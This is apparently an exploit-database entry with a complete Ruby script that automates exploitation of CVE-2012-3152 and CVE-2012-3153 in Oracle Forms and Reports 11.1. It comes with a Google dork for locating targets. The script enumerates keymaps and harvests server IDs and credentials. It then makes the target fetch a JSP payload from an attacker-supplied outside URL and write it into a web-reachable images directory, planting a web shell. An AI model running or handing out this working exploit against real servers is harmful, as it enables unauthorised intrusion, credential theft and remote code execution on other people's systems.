Oracle Forms and Reports 11.1 - Remote Exploit

:
30.01.2014
:
Oracle Forms and Reports 11.1
:
:
Oracle Forms and Reports

#!/usr/bin/env ruby

# Exploit Title: Oracle Reports 11.1
# About: Automated exploit for CVE-2012-3153/CVE-2012-3152
# Google Dork: inurl:/reports/rwservlet/
# Date: 01/28/2014
# Exploit Author: Mekanismen <mattias@gotroot.eu>
# Credits to: @miss_sudo for initial disclosure
# Reference: http://netinfiltration.com/
# Vendor Homepage: http://www.oracle.com/
# Version: 11.1
# Tested on: Linux
# CVE-2012-3153
# CVE-2012-3152

require 'uri'
require 'open-uri'
require 'openssl'
#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE

def upload_payload(dest)
url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
#print url
begin
uri = URI.parse(url)
html = uri.open.read
rescue
html = ""
end

if html =~ /Successfully run/
@hacked = true
print "[+] Payload uploaded!\n"
else
print "[-] Payload uploaded failed\n"
end
end

def getenv(server, authid)
print "[+] Found server: #{server}\n"
print "[+] Found credentials: #{authid}\n"
print "[*] Querying showenv ... \n"
begin
uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
html = uri.open.read
rescue
html = ""
end

if html =~ /\/(.*)\/showenv/
print "[+] Query succeeded, uploading payload ... \n"
upload_payload($1)
else
print "[-] Query failed... \n"
end
end

@payload_url = "" #the url that holds our payload (we can execute .jsp on the server)
@url = "" #url to compromise
@hacked = false
@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp"

print "[*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n"
print "[*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
print "[*] Credits to: @miss_sudo\n"

unless ARGV[0] and ARGV[1]
print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
exit
end

@url = ARGV[0]
@payload_url = ARGV[1]
print "[*] Target URL: #{@url}\n"
print "[*] Payload URL: #{@payload_url}\n"
print "[*] Payload name: #{@payload_name}\n"

begin
#Can we view keymaps?
uri = URI.parse("#{@url}/reports/rwservlet/showmap")
html = uri.open.read
rescue
print "[-] URL not vulnerable or unreachable\n"
exit
end

test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten

#Parse keymaps for servers
print "[*] Enumerating keymaps ... \n"
test.each do |t|
if not @hacked
t = t.delete(' ')
url = "#{@url}/reports/rwservlet/parsequery?#{t}"

begin
uri = URI.parse(url)
html = uri.open.read
rescue
end

#to automate exploitation we need to query showenv for a local path
#we need a server id and creds for this, we enumerate the keymaps and hope for the best
#showenv tells us the local PATH of /reports/ where we upload the shell
#so we can reach it from /reports/images/<shell>.jsp

if html =~ /userid=(.*)@/
authid = $1
end
if html =~ /server=(\S*)/
server = $1
end

if server and authid
getenv(server, authid)
end
else
break
end
end

if @hacked
print "[*] Server hopefully compromised!\n"
print "[*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
else
print "[*] Enumeration done ... no vulnerable keymaps for automatic explotation found :(\n"
#server is still vulnerable but cannot be automatically exploited ... i guess
end